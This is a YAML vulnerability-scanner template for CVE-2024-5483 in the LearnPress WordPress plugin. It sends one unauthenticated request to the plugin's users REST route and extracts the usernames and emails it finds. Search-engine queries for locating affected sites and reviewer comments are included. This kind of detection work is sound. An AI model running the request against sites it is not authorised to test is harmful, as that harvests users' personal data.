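# Detection template for CVE-2024-5483: checks whether the LearnPress REST
# route /wp-json/learnpress/v1/users answers an unauthenticated GET with a
# JSON user listing.
id: CVE-2024-5483

info:
  name: LearnPress < 4.2.6.8.1 - Information Disclosure
  author: pussycat0x
  severity: medium
  description: |
    LearnPress – WordPress LMS Plugin contains a sensitive information exposure caused by incorrect implementation of get_items_permissions_check function in all versions up to 4.2.6.8, letting unauthenticated attackers extract user emails and basic information.
  impact: |
    Unauthenticated attackers can access sensitive user information, including emails, leading to privacy breaches.
  # NOTE(review): the title gives the boundary as "< 4.2.6.8.1" while this
  # line names 4.2.6.9; both are consistent with "up to 4.2.6.8", but confirm
  # the first fixed release against the vendor changelog.
  remediation: Update to version 4.2.6.9 or later.
  reference:
    - https://wpscan.com/vulnerability/1f253156-333b-4be6-b727-06237567be1e/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-5483
    epss-score: 0.05516
    epss-percentile: 0.90397
    cwe-id: CWE-200
  metadata:
    verified: true
    # One GET with a single path is sent, so the request budget is 1
    # (the value was 2, which did not match the http block below).
    max-request: 1
    vendor: thimpress
    product: learnpress
    framework: wordpress
    # Search-engine queries are quoted so the embedded '"' and ':' characters
    # can never be re-interpreted by a YAML parser.
    publicwww-query: '/wp-content/plugins/learnpress/'
    fofa-query: 'body="/wp-content/plugins/learnpress/"'
    shodan-query: 'http.html:"/wp-content/plugins/learnpress/"'
  tags: cve,cve2024,wordpress,wpscan,wp-plugin,learnpress,vuln,info-leak

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/learnpress/v1/users"

    matchers:
      # All three expressions must hold: HTTP 200, a JSON content type, and
      # the field names of a user record present in the body.
      # NOTE(review): the field names are matched as bare substrings anywhere
      # in the body, so an unrelated JSON document containing these words
      # would also match; confirm a finding against the extracted values.
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          # "email" was listed twice in the original argument list; the
          # duplicate added nothing and has been dropped.
          - 'contains_all(body, "id","email","username")'
        condition: and

    extractors:
      # The two regex extractors are internal: their captures (group 1) are
      # kept as the variables user_email and username instead of being
      # reported directly.
      - type: regex
        name: user_email
        part: body
        regex:
          - '"(?:email|user_email)"\s*:\s*"([^"@]+@[^"]+)"'
        group: 1
        internal: true

      - type: regex
        name: username
        part: body
        regex:
          - '"(?:username|user_login)"\s*:\s*"([^"]+)"'
        group: 1
        internal: true

      # Formats the captured variables into the lines shown in the result.
      # The reported lines therefore contain an account name and e-mail
      # address taken from the response.
      - type: dsl
        dsl:
          - "'Username: ' + username"
          - "'Email: ' + user_email"
# NOTE(review): the digest below was issued for the template text as originally
# published; any edit to the file (including reformatting or added comments)
# presumably no longer matches it, so re-sign before relying on it as verified.
# digest: 490a00463044022079f1e5fde98fc5241b84510cb8302999a80fcf9536a8acd55b556f5d6935c49c0220568412b92f129a97f34ca1f928def99652788fc27c3f76709255eafa70ebddbc:922c64590222798bb761d5b6d8e72950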